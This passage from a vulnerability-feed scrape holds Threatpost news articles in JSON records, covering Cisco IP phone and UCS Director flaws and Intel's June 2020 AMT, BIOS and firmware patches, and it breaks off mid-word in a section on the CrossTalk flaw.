10](<https://www.cvedetails.com/cve/CVE-2016-1421/>) on the CVSS scale).\n\nHowever, Baines found that the flaw could be exploited by an unauthenticated actor (previously Cisco said exploiting the flaw required authentication) and could potentially enable remote code execution as well as DoS (previously Cisco found it could only enable DoS). Baines also found a produce, the Wireless IP Phone 8821, to be vulnerable that wasn\u2019t listed on the affected list.\n\n**Other Critical Flaws**\n\nCisco [Wednesday also addressed](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucsd-mult-vulns-UNfpdW4E>) critical- and high-severity flaws tied to nine CVEs in its Cisco Unified Computing System (UCS) Director and Cisco UCS Director Express for Big Data. Cisco UCS Director is an end-to-end management platform for various Cisco and non-Cisco data infrastructure components. Cisco UCS Director Express for Big Data is an open private-cloud platform that delivers Big-Data-as-a-Service on premises.\n\nThe flaws (CVE-2020-3239, CVE-2020-3240, CVE-2020-3243, CVE-2020-3247, CVE-2020-3248, CVE-2020-3249, CVE-2020-3250, CVE-2020-3251, CVE-2020-3252) exist in the REST API for both products, and may allow a remote attacker to bypass authentication or conduct directory traversal attacks on an affected device. Below is a list of affected products and the fixed releases.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132738/cisco-critical-flaw-2.png>)\n\nSteven Seeley of Source Incite, working with Trend Micro\u2019s Zero Day Initiative, was credited with reporting the flaws.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory,\u201d according to Cisco.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-16T18:49:27", "type": "threatpost", "title": "Cisco IP Phone Harbors Critical RCE Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1421", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3161", "CVE-2020-3239", "CVE-2020-3240", "CVE-2020-3243", "CVE-2020-3247", "CVE-2020-3248", "CVE-2020-3249", "CVE-2020-3250", "CVE-2020-3251", "CVE-2020-3252", "CVE-2020-5135"], "modified": "2020-04-16T18:49:27", "id": "THREATPOST:F2B495A97075920EEF1C7328AE80CC7B", "href": "https://threatpost.com/critical-cisco-ip-phone-rce-flaw/154864/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:18:38", "description": "Intel has released its June security updates, which address two critical vulnerabilities that, if exploited, can give unauthenticated attackers elevated privileges.\n\nThe critical flaws exist in [Intel\u2019s Active Management Technology](<https://threatpost.com/intel-amt-loophole-allows-hackers-to-gain-control-of-some-pcs-in-under-a-minute/129408/>) (AMT), which is used for remote out-of-band management of personal computers.\n\nThe two critical flaws ([CVE-2020-0594](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0594>) and [CVE-2020-0595](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0595>)) exist in the IPv6 subsystem of AMT (and Intel\u2019s Standard Manageability solution, which has a similar function as AMT). The flaws could potentially enable an unauthenticated user to gain elevated privileges via network access. AMT versions before 11.8.77, 11.12.77, 11.22.77 and 12.0.64 are affected.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nCVE-2020-0594 is an out-of-bounds read flaw while CVE-2020-0595 is a use-after-free vulnerability. Both flaws ranks 9.8 out of 10.0 on the CVSS scale, making them critical.\n\nA high-severity privilege escalation flaw, existing in the Intel Innovation Engine, was also patched. Innovation Engine is an embedded core in the Peripheral Controller Hub (PCH), that is a dedicated subsystem that system vendors can use to customize their firmware.\n\nThe flaw ([CVE-2020-8675](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8675>)) stems from insufficient control flow management in the Innovation Engine\u2019s firmware build and signing tool, before version 1.0.859, may allow an unauthenticated user to potentially enable escalation of privilege via physical access.\n\nA flaw was also fixed in Intel\u2019s Solid State Drive (SSD) products, which allow information disclosure. The flaw ([CVE-2020-0527](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0527>)) stems from insufficient control flow management in firmware for some Intel Data Center SSDs (a list of affected products [can be found here](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00266.html>)).\n\nThe flaw \u201cmay allow a privileged user to potentially enable information disclosure via local access,\u201d according to Intel.\n\nIntel also fixed flaws in the [BIOS firmware](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00322.html>) for some Intel Processors, which may enable escalation of privilege or denial of service (DoS). That includes a high-severity flaw ([CVE-2020-0528](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0528>)) stemming from Improper buffer restrictions in the BIOS firmware for 7th, 8th, 9th and 10th Generation Intel Core processor families. In order to exploit this flaw, an attacker would need to be authenticated (for privilege escalation) and have local access (for DoS).\n\n\u201cIntel recommends that users update to the latest firmware version provided by the system manufacturer that addresses this issue,\u201d according to the [chip giant\u2019s advisory](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00366.html>).\n\nIntel [also fixed an array](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00295.html>) of high-severity flaws (including [CVE-2020-0586](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0586>), [CVE-2020-0542](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0542>), [CVE-2020-0596](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0596>),[CVE-2020-0538](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0538>), [CVE-2020-0534](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0534>), [CVE-2020-0533](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0533>), [CVE-2020-0566](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0566>) and [CVE-2020-0532](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0532>))across its Converged Security and Manageability Engine (CSME), Server Platform Services (SPS), Trusted Execution Engine (TXE) and Dynamic Application Loader (DAL) products.\n\n## **CrossTalk Flaw**\n\nOne [medium-severity flaw](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00320.html>) disclosed Tuesday by Intel ([CVE-2020-0543](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0543>)) was called \u201cCrossTalk\u201d by security researche